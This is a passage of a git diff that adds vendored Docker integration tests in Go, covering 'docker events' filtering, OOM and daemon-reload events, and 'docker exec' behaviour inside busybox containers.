+	result := dockerCmdWithResult("events", "--format", "{{badFuncString .}}")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		Error:    "exit status 64",
+		ExitCode: 64,
+		Err:      "Error parsing format: template: :1: function \"badFuncString\" not defined",
+	})
+}
+
+func (s *DockerSuite) TestEventsFormatBadField(c *check.C) {
+	// make sure it fails immediately, without receiving any event
+	result := dockerCmdWithResult("events", "--format", "{{.badFieldString}}")
+	c.Assert(result, icmd.Matches, icmd.Expected{
+		Error:    "exit status 64",
+		ExitCode: 64,
+		Err:      "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message",
+	})
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
new file mode 100644
index 0000000000..dc91667116
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go
@@ -0,0 +1,486 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"strings"
+	"syscall"
+	"time"
+	"unicode"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// #5979
+func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) {
+	since := daemonUnixTime(c)
+	dockerCmd(c, "run", "busybox", "true")
+
+	file, err := ioutil.TempFile("", "")
+	c.Assert(err, checker.IsNil, check.Commentf("could not create temp file"))
+	defer os.Remove(file.Name())
+
+	command := fmt.Sprintf("%s events --since=%s --until=%s > %s", dockerBinary, since, daemonUnixTime(c), file.Name())
+	_, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil, check.Commentf("Could not open pty"))
+	cmd := exec.Command("sh", "-c", command)
+	cmd.Stdin = tty
+	cmd.Stdout = tty
+	cmd.Stderr = tty
+	c.Assert(cmd.Run(), checker.IsNil, check.Commentf("run err for command %q", command))
+
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		for _, ch := range scanner.Text() {
+			c.Assert(unicode.IsControl(ch), checker.False, check.Commentf("found control character %v", []byte(string(ch))))
+		}
+	}
+	c.Assert(scanner.Err(), checker.IsNil, check.Commentf("Scan err for command %q", command))
+
+}
+
+func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) {
+	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport)
+
+	errChan := make(chan error)
+	go func() {
+		defer close(errChan)
+		out, exitCode, _ := dockerCmdWithError("run", "--name", "oomFalse", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
+		if expected := 137; exitCode != expected {
+			errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out)
+		}
+	}()
+	select {
+	case err := <-errChan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(30 * time.Second):
+		c.Fatal("Timeout waiting for container to die on OOM")
+	}
+
+	out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=oomFalse", "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSuffix(out, "\n"), "\n")
+	nEvents := len(events)
+
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event
+	c.Assert(parseEventAction(c, events[nEvents-5]), checker.Equals, "create")
+	c.Assert(parseEventAction(c, events[nEvents-4]), checker.Equals, "attach")
+	c.Assert(parseEventAction(c, events[nEvents-3]), checker.Equals, "start")
+	c.Assert(parseEventAction(c, events[nEvents-2]), checker.Equals, "oom")
+	c.Assert(parseEventAction(c, events[nEvents-1]), checker.Equals, "die")
+}
+
+func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) {
+	testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport)
+
+	errChan := make(chan error)
+	observer, err := newEventObserver(c)
+	c.Assert(err, checker.IsNil)
+	err = observer.Start()
+	c.Assert(err, checker.IsNil)
+	defer observer.Stop()
+
+	go func() {
+		defer close(errChan)
+		out, exitCode, _ := dockerCmdWithError("run", "--oom-kill-disable=true", "--name", "oomTrue", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
+		if expected := 137; exitCode != expected {
+			errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out)
+		}
+	}()
+
+	c.Assert(waitRun("oomTrue"), checker.IsNil)
+	defer dockerCmd(c, "kill", "oomTrue")
+	containerID := inspectField(c, "oomTrue", "Id")
+
+	testActions := map[string]chan bool{
+		"oom": make(chan bool),
+	}
+
+	matcher := matchEventLine(containerID, "container", testActions)
+	processor := processEventMatch(testActions)
+	go observer.Match(matcher, processor)
+
+	select {
+	case <-time.After(20 * time.Second):
+		observer.CheckEventError(c, containerID, "oom", matcher)
+	case <-testActions["oom"]:
+		// ignore, done
+	case errRun := <-errChan:
+		if errRun != nil {
+			c.Fatalf("%v", errRun)
+		} else {
+			c.Fatalf("container should be still running but it's not")
+		}
+	}
+
+	status := inspectField(c, "oomTrue", "State.Status")
+	c.Assert(strings.TrimSpace(status), checker.Equals, "running", check.Commentf("container should be still running"))
+}
+
+// #18453
+func (s *DockerSuite) TestEventsContainerFilterByName(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	cOut, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top")
+	c1 := strings.TrimSpace(cOut)
+	waitRun("foo")
+	cOut, _ = dockerCmd(c, "run", "--name=bar", "-d", "busybox", "top")
+	c2 := strings.TrimSpace(cOut)
+	waitRun("bar")
+	out, _ := dockerCmd(c, "events", "-f", "container=foo", "--since=0", "--until", daemonUnixTime(c))
+	c.Assert(out, checker.Contains, c1, check.Commentf(out))
+	c.Assert(out, checker.Not(checker.Contains), c2, check.Commentf(out))
+}
+
+// #18453
+func (s *DockerSuite) TestEventsContainerFilterBeforeCreate(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	buf := &bytes.Buffer{}
+	cmd := exec.Command(dockerBinary, "events", "-f", "container=foo", "--since=0")
+	cmd.Stdout = buf
+	c.Assert(cmd.Start(), check.IsNil)
+	defer cmd.Wait()
+	defer cmd.Process.Kill()
+
+	// Sleep for a second to make sure we are testing the case where events are listened before container starts.
+	time.Sleep(time.Second)
+	id, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top")
+	cID := strings.TrimSpace(id)
+	for i := 0; ; i++ {
+		out := buf.String()
+		if strings.Contains(out, cID) {
+			break
+		}
+		if i > 30 {
+			c.Fatalf("Missing event of container (foo, %v), got %q", cID, out)
+		}
+		time.Sleep(500 * time.Millisecond)
+	}
+}
+
+func (s *DockerSuite) TestVolumeEvents(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	since := daemonUnixTime(c)
+
+	// Observe create/mount volume actions
+	dockerCmd(c, "volume", "create", "test-event-volume-local")
+	dockerCmd(c, "run", "--name", "test-volume-container", "--volume", "test-event-volume-local:/foo", "-d", "busybox", "true")
+	waitRun("test-volume-container")
+
+	// Observe unmount/destroy volume actions
+	dockerCmd(c, "rm", "-f", "test-volume-container")
+	dockerCmd(c, "volume", "rm", "test-event-volume-local")
+
+	until := daemonUnixTime(c)
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", until)
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.GreaterThan, 4)
+
+	volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume")
+	c.Assert(volumeEvents, checker.HasLen, 4)
+	c.Assert(volumeEvents[0], checker.Equals, "create")
+	c.Assert(volumeEvents[1], checker.Equals, "mount")
+	c.Assert(volumeEvents[2], checker.Equals, "unmount")
+	c.Assert(volumeEvents[3], checker.Equals, "destroy")
+}
+
+func (s *DockerSuite) TestNetworkEvents(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	since := daemonUnixTime(c)
+
+	// Observe create/connect network actions
+	dockerCmd(c, "network", "create", "test-event-network-local")
+	dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local", "-d", "busybox", "true")
+	waitRun("test-network-container")
+
+	// Observe disconnect/destroy network actions
+	dockerCmd(c, "rm", "-f", "test-network-container")
+	dockerCmd(c, "network", "rm", "test-event-network-local")
+
+	until := daemonUnixTime(c)
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", until)
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.GreaterThan, 4)
+
+	netEvents := eventActionsByIDAndType(c, events, "test-event-network-local", "network")
+	c.Assert(netEvents, checker.HasLen, 4)
+	c.Assert(netEvents[0], checker.Equals, "create")
+	c.Assert(netEvents[1], checker.Equals, "connect")
+	c.Assert(netEvents[2], checker.Equals, "disconnect")
+	c.Assert(netEvents[3], checker.Equals, "destroy")
+}
+
+func (s *DockerSuite) TestEventsContainerWithMultiNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// Observe create/connect network actions
+	dockerCmd(c, "network", "create", "test-event-network-local-1")
+	dockerCmd(c, "network", "create", "test-event-network-local-2")
+	dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local-1", "-td", "busybox", "sh")
+	waitRun("test-network-container")
+	dockerCmd(c, "network", "connect", "test-event-network-local-2", "test-network-container")
+
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "stop", "-t", "1", "test-network-container")
+
+	until := daemonUnixTime(c)
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "-f", "type=network")
+	netEvents := strings.Split(strings.TrimSpace(out), "\n")
+
+	// received two network disconnect events
+	c.Assert(len(netEvents), checker.Equals, 2)
+	c.Assert(netEvents[0], checker.Contains, "disconnect")
+	c.Assert(netEvents[1], checker.Contains, "disconnect")
+
+	//both networks appeared in the network event output
+	c.Assert(out, checker.Contains, "test-event-network-local-1")
+	c.Assert(out, checker.Contains, "test-event-network-local-2")
+}
+
+func (s *DockerSuite) TestEventsStreaming(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	observer, err := newEventObserver(c)
+	c.Assert(err, checker.IsNil)
+	err = observer.Start()
+	c.Assert(err, checker.IsNil)
+	defer observer.Stop()
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox:latest", "true")
+	containerID := strings.TrimSpace(out)
+
+	testActions := map[string]chan bool{
+		"create":  make(chan bool, 1),
+		"start":   make(chan bool, 1),
+		"die":     make(chan bool, 1),
+		"destroy": make(chan bool, 1),
+	}
+
+	matcher := matchEventLine(containerID, "container", testActions)
+	processor := processEventMatch(testActions)
+	go observer.Match(matcher, processor)
+
+	select {
+	case <-time.After(5 * time.Second):
+		observer.CheckEventError(c, containerID, "create", matcher)
+	case <-testActions["create"]:
+		// ignore, done
+	}
+
+	select {
+	case <-time.After(5 * time.Second):
+		observer.CheckEventError(c, containerID, "start", matcher)
+	case <-testActions["start"]:
+		// ignore, done
+	}
+
+	select {
+	case <-time.After(5 * time.Second):
+		observer.CheckEventError(c, containerID, "die", matcher)
+	case <-testActions["die"]:
+		// ignore, done
+	}
+
+	dockerCmd(c, "rm", containerID)
+
+	select {
+	case <-time.After(5 * time.Second):
+		observer.CheckEventError(c, containerID, "destroy", matcher)
+	case <-testActions["destroy"]:
+		// ignore, done
+	}
+}
+
+func (s *DockerSuite) TestEventsImageUntagDelete(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	observer, err := newEventObserver(c)
+	c.Assert(err, checker.IsNil)
+	err = observer.Start()
+	c.Assert(err, checker.IsNil)
+	defer observer.Stop()
+
+	name := "testimageevents"
+	imageID, err := buildImage(name,
+		`FROM scratch
+		MAINTAINER "docker"`,
+		true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(deleteImages(name), checker.IsNil)
+
+	testActions := map[string]chan bool{
+		"untag":  make(chan bool, 1),
+		"delete": make(chan bool, 1),
+	}
+
+	matcher := matchEventLine(imageID, "image", testActions)
+	processor := processEventMatch(testActions)
+	go observer.Match(matcher, processor)
+
+	select {
+	case <-time.After(10 * time.Second):
+		observer.CheckEventError(c, imageID, "untag", matcher)
+	case <-testActions["untag"]:
+		// ignore, done
+	}
+
+	select {
+	case <-time.After(10 * time.Second):
+		observer.CheckEventError(c, imageID, "delete", matcher)
+	case <-testActions["delete"]:
+		// ignore, done
+	}
+}
+
+func (s *DockerSuite) TestEventsFilterVolumeAndNetworkType(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "network", "create", "test-event-network-type")
+	dockerCmd(c, "volume", "create", "test-event-volume-type")
+
+	out, _ := dockerCmd(c, "events", "--filter", "type=volume", "--filter", "type=network", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.GreaterOrEqualThan, 2, check.Commentf(out))
+
+	networkActions := eventActionsByIDAndType(c, events, "test-event-network-type", "network")
+	volumeActions := eventActionsByIDAndType(c, events, "test-event-volume-type", "volume")
+
+	c.Assert(volumeActions[0], checker.Equals, "create")
+	c.Assert(networkActions[0], checker.Equals, "create")
+}
+
+func (s *DockerSuite) TestEventsFilterVolumeID(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "volume", "create", "test-event-volume-id")
+	out, _ := dockerCmd(c, "events", "--filter", "volume=test-event-volume-id", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1)
+
+	c.Assert(events[0], checker.Contains, "test-event-volume-id")
+	c.Assert(events[0], checker.Contains, "driver=local")
+}
+
+func (s *DockerSuite) TestEventsFilterNetworkID(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "network", "create", "test-event-network-local")
+	out, _ := dockerCmd(c, "events", "--filter", "network=test-event-network-local", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1)
+
+	c.Assert(events[0], checker.Contains, "test-event-network-local")
+	c.Assert(events[0], checker.Contains, "type=bridge")
+}
+
+func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// daemon config file
+	configFilePath := "test.json"
+	configFile, err := os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(configFilePath)
+
+	daemonConfig := `{"labels":["foo=bar"]}`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+
+	// Get daemon ID
+	out, err := s.d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	daemonID := ""
+	daemonName := ""
+	for _, line := range strings.Split(out, "\n") {
+		if strings.HasPrefix(line, "ID: ") {
+			daemonID = strings.TrimPrefix(line, "ID: ")
+		} else if strings.HasPrefix(line, "Name: ") {
+			daemonName = strings.TrimPrefix(line, "Name: ")
+		}
+	}
+	c.Assert(daemonID, checker.Not(checker.Equals), "")
+
+	configFile, err = os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	daemonConfig = `{"max-concurrent-downloads":1,"labels":["bar=foo"], "shutdown-timeout": 10}`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	time.Sleep(3 * time.Second)
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c))
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", daemonID, daemonName))
+}
+
+func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	// daemon config file
+	configFilePath := "test.json"
+	configFile, err := os.Create(configFilePath)
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(configFilePath)
+
+	daemonConfig := `{"labels":["foo=bar"]}`
+	fmt.Fprintf(configFile, "%s", daemonConfig)
+	configFile.Close()
+	c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil)
+
+	// Get daemon ID
+	out, err := s.d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	daemonID := ""
+	daemonName := ""
+	for _, line := range strings.Split(out, "\n") {
+		if strings.HasPrefix(line, "ID: ") {
+			daemonID = strings.TrimPrefix(line, "ID: ")
+		} else if strings.HasPrefix(line, "Name: ") {
+			daemonName = strings.TrimPrefix(line, "Name: ")
+		}
+	}
+	c.Assert(daemonID, checker.Not(checker.Equals), "")
+
+	syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP)
+
+	time.Sleep(3 * time.Second)
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonID))
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID))
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonName))
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID))
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "daemon=foo")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID))
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "type=daemon")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID))
+
+	out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "type=container")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
new file mode 100644
index 0000000000..cac76d96ae
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go
@@ -0,0 +1,601 @@
+// +build !test_no_exec
+
+package main
+
+import (
+	"bufio"
+	"fmt"
+	"net/http"
+	"os"
+	"os/exec"
+	"reflect"
+	"runtime"
+	"sort"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestExec(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
+	c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil)
+
+	out, _ = dockerCmd(c, "exec", "testing", "cat", "/tmp/file")
+	out = strings.Trim(out, "\r\n")
+	c.Assert(out, checker.Equals, "test")
+
+}
+
+func (s *DockerSuite) TestExecInteractive(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
+
+	execCmd := exec.Command(dockerBinary, "exec", "-i", "testing", "sh")
+	stdin, err := execCmd.StdinPipe()
+	c.Assert(err, checker.IsNil)
+	stdout, err := execCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+
+	err = execCmd.Start()
+	c.Assert(err, checker.IsNil)
+	_, err = stdin.Write([]byte("cat /tmp/file\n"))
+	c.Assert(err, checker.IsNil)
+
+	r := bufio.NewReader(stdout)
+	line, err := r.ReadString('\n')
+	c.Assert(err, checker.IsNil)
+	line = strings.TrimSpace(line)
+	c.Assert(line, checker.Equals, "test")
+	err = stdin.Close()
+	c.Assert(err, checker.IsNil)
+	errChan := make(chan error)
+	go func() {
+		errChan <- execCmd.Wait()
+		close(errChan)
+	}()
+	select {
+	case err := <-errChan:
+		c.Assert(err, checker.IsNil)
+	case <-time.After(1 * time.Second):
+		c.Fatal("docker exec failed to exit on stdin close")
+	}
+
+}
+
+func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) {
+	out, _ := runSleepingContainer(c)
+	cleanedContainerID := strings.TrimSpace(out)
+	c.Assert(waitRun(cleanedContainerID), check.IsNil)
+	dockerCmd(c, "restart", cleanedContainerID)
+	c.Assert(waitRun(cleanedContainerID), check.IsNil)
+
+	out, _ = dockerCmd(c, "exec", cleanedContainerID, "echo", "hello")
+	outStr := strings.TrimSpace(out)
+	c.Assert(outStr, checker.Equals, "hello")
+}
+
+func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) {
+	// TODO Windows CI: Requires a little work to get this ported.
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon)
+
+	err := s.d.StartWithBusybox()
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out))
+
+	err = s.d.Restart()
+	c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon"))
+
+	out, err = s.d.Cmd("start", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out))
+
+	out, err = s.d.Cmd("exec", "top", "echo", "hello")
+	c.Assert(err, checker.IsNil, check.Commentf("Could not exec on container top: %s", out))
+
+	outStr := strings.TrimSpace(string(out))
+	c.Assert(outStr, checker.Equals, "hello")
+}
+
+// Regression test for #9155, #9044
+func (s *DockerSuite) TestExecEnv(c *check.C) {
+	// TODO Windows CI: This one is interesting and may just end up being a feature
+	// difference between Windows and Linux. On Windows, the environment is passed
+	// into the process that is launched, not into the machine environment. Hence
+	// a subsequent exec will not have LALA set/
+	testRequires(c, DaemonIsLinux)
+	runSleepingContainer(c, "-e", "LALA=value1", "-e", "LALA=value2", "-d", "--name", "testing")
+	c.Assert(waitRun("testing"), check.IsNil)
+
+	out, _ := dockerCmd(c, "exec", "testing", "env")
+	c.Assert(out, checker.Not(checker.Contains), "LALA=value1")
+	c.Assert(out, checker.Contains, "LALA=value2")
+	c.Assert(out, checker.Contains, "HOME=/root")
+}
+
+func (s *DockerSuite) TestExecSetEnv(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	runSleepingContainer(c, "-e", "HOME=/root", "-d", "--name", "testing")
+	c.Assert(waitRun("testing"), check.IsNil)
+
+	out, _ := dockerCmd(c, "exec", "-e", "HOME=/another", "-e", "ABC=xyz", "testing", "env")
+	c.Assert(out, checker.Not(checker.Contains), "HOME=/root")
+	c.Assert(out, checker.Contains, "HOME=/another")
+	c.Assert(out, checker.Contains, "ABC=xyz")
+}
+
+func (s *DockerSuite) TestExecExitStatus(c *check.C) {
+	runSleepingContainer(c, "-d", "--name", "top")
+
+	result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23")
+	c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"})
+}
+
+func (s *DockerSuite) TestExecPausedContainer(c *check.C) {
+	testRequires(c, IsPausable)
+	defer unpauseAllContainers()
+
+	out, _ := runSleepingContainer(c, "-d", "--name", "testing")
+	ContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "pause", "testing")
+	out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello")
+	c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused"))
+
+	expected := ContainerID + " is paused, unpause the container before exec"
+	c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused"))
+}
+
+// regression test for #9476
+func (s *DockerSuite) TestExecTTYCloseStdin(c *check.C) {
+	// TODO Windows CI: This requires some work to port to Windows.
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "-it", "--name", "exec_tty_stdin", "busybox")
+
+	cmd := exec.Command(dockerBinary, "exec", "-i", "exec_tty_stdin", "cat")
+	stdinRw, err := cmd.StdinPipe()
+	c.Assert(err, checker.IsNil)
+
+	stdinRw.Write([]byte("test"))
+	stdinRw.Close()
+
+	out, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, _ = dockerCmd(c, "top", "exec_tty_stdin")
+	outArr := strings.Split(out, "\n")
+	c.Assert(len(outArr), checker.LessOrEqualThan, 3, check.Commentf("exec process left running"))
+	c.Assert(out, checker.Not(checker.Contains), "nsenter-exec")
+}
+
+func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	errChan := make(chan error)
+	go func() {
+		defer close(errChan)
+
+		cmd := exec.Command(dockerBinary, "exec", "-ti", id, "true")
+		if _, err := cmd.StdinPipe(); err != nil {
+			errChan <- err
+			return
+		}
+
+		expected := "the input device is not a TTY"
+		if runtime.GOOS == "windows" {
+			expected += ".  If you are using mintty, try prefixing the command with 'winpty'"
+		}
+		if out, _, err := runCommandWithOutput(cmd); err == nil {
+			errChan <- fmt.Errorf("exec should have failed")
+			return
+		} else if !strings.Contains(out, expected) {
+			errChan <- fmt.Errorf("exec failed with error %q: expected %q", out, expected)
+			return
+		}
+	}()
+
+	select {
+	case err := <-errChan:
+		c.Assert(err, check.IsNil)
+	case <-time.After(3 * time.Second):
+		c.Fatal("exec is running but should have failed")
+	}
+}
+
+func (s *DockerSuite) TestExecParseError(c *check.C) {
+	// TODO Windows CI: Requires some extra work. Consider copying the
+	// runSleepingContainer helper to have an exec version.
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
+
+	// Test normal (non-detached) case first
+	cmd := exec.Command(dockerBinary, "exec", "top")
+	_, stderr, _, err := runCommandWithStdoutStderr(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(stderr, checker.Contains, "See 'docker exec --help'")
+}
+
+func (s *DockerSuite) TestExecStopNotHanging(c *check.C) {
+	// TODO Windows CI: Requires some extra work. Consider copying the
+	// runSleepingContainer helper to have an exec version.
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
+
+	err := exec.Command(dockerBinary, "exec", "testing", "top").Start()
+	c.Assert(err, checker.IsNil)
+
+	type dstop struct {
+		out []byte
+		err error
+	}
+
+	ch := make(chan dstop)
+	go func() {
+		out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput()
+		ch <- dstop{out, err}
+		close(ch)
+	}()
+	select {
+	case <-time.After(3 * time.Second):
+		c.Fatal("Container stop timed out")
+	case s := <-ch:
+		c.Assert(s.err, check.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestExecCgroup(c *check.C) {
+	// Not applicable on Windows - using Linux specific functionality
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
+
+	out, _ := dockerCmd(c, "exec", "testing", "cat", "/proc/1/cgroup")
+	containerCgroups := sort.StringSlice(strings.Split(out, "\n"))
+
+	var wg sync.WaitGroup
+	var mu sync.Mutex
+	execCgroups := []sort.StringSlice{}
+	errChan := make(chan error)
+	// exec a few times concurrently to get consistent failure
+	for i := 0; i < 5; i++ {
+		wg.Add(1)
+		go func() {
+			out, _, err := dockerCmdWithError("exec", "testing", "cat", "/proc/self/cgroup")
+			if err != nil {
+				errChan <- err
+				return
+			}
+			cg := sort.StringSlice(strings.Split(out, "\n"))
+
+			mu.Lock()
+			execCgroups = append(execCgroups, cg)
+			mu.Unlock()
+			wg.Done()
+		}()
+	}
+	wg.Wait()
+	close(errChan)
+
+	for err := range errChan {
+		c.Assert(err, checker.IsNil)
+	}
+
+	for _, cg := range execCgroups {
+		if !reflect.DeepEqual(cg, containerCgroups) {
+			fmt.Println("exec cgroups:")
+			for _, name := range cg {
+				fmt.Printf(" %s\n", name)
+			}
+
+			fmt.Println("container cgroups:")
+			for _, name := range containerCgroups {
+				fmt.Printf(" %s\n", name)
+			}
+			c.Fatal("cgroups mismatched")
+		}
+	}
+}
+
+func (s *DockerSuite) TestExecInspectID(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	id := strings.TrimSuffix(out, "\n")
+
+	out = inspectField(c, id, "ExecIDs")
+	c.Assert(out, checker.Equals, "[]", check.Commentf("ExecIDs should be empty, got: %s", out))
+
+	// Start an exec, have it block waiting so we can do some checking
+	cmd := exec.Command(dockerBinary, "exec", id, "sh", "-c",
+		"while ! test -e /execid1; do sleep 1; done")
+
+	err := cmd.Start()
+	c.Assert(err, checker.IsNil, check.Commentf("failed to start the exec cmd"))
+
+	// Give the exec 10 chances/seconds to start then give up and stop the test
+	tries := 10
+	for i := 0; i < tries; i++ {
+		// Since its still running we should see exec as part of the container
+		out = strings.TrimSpace(inspectField(c, id, "ExecIDs"))
+
+		if out != "[]" && out != "<no value>" {
+			break
+		}
+		c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still empty after 10 second"))
+		time.Sleep(1 * time.Second)
